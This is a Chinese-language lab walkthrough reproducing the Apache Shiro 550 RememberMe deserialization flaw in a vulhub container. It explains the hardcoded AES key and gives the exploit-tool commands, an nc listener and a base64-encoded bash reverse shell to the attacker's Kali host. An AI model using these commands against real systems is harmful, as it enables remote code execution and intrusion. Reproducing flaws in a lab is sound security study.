shiro_550反序列化复现.md

Shiro 550 漏洞复现

环境搭建

使用vulhub进行搭建，这个vulhub还是很方便的

漏洞原理

漏洞出现在cookie中的RememberMe字段中，说的简单通俗易懂些，当服务端获取到RememberMe后，会进行如下操作

1. base64解密
2. AES解密
3. 反序列化

知道他的工作流程后，我们只需要将自己的payload反向操作就好了

1. 序列化
2. AES加密
3. base64加密

现在最关键的就是AES的密钥，然而恰巧的是Shiro 550中的AES密钥是硬编码写死在代码里的，所以密钥是不会变的，每个人可以通过源代码获取到密钥。

漏洞复现

靶机IP：192.168.214.136

Kali：192.168.214.129

POC：https://github.com/insightglacier/Shiro_exploit

在Kali里执行POC，来验证是否可行

创建一个a.txt文件

root@kali:~/Desktop/Shiro_exploit-master# python3 shiro_exploit.py -t 3 -u http://192.168.214.136 -p "touch a.txt"

等待结束就好

结束后进入容器查看docker exec -it 4f /bin/bash，是存在a.txt，说明次POC可行，可以命令执行。

在Kali上nc监听

nc -lvp 4444

加密反弹shell

加密网站：http://jackson-t.ca/runtime-exec-payloads.html

加密前

bash -i >& /dev/tcp/192.168.214.129/4444 0>&1

加密后

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNC4xMjkvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

使用Shiro_exploit的poc漏洞执行反弹shell

python3 shiro_exploit.py -t 3 -u http://192.168.214.136 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNC4xMjkvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"

连接成功

成功连接到了docker里。

总结

这次只是复现了这个漏洞，并没有对其原理做更多的解释。后续可以在对其进行研究，还有需要复现一下Shiro 721。

Q.E.D.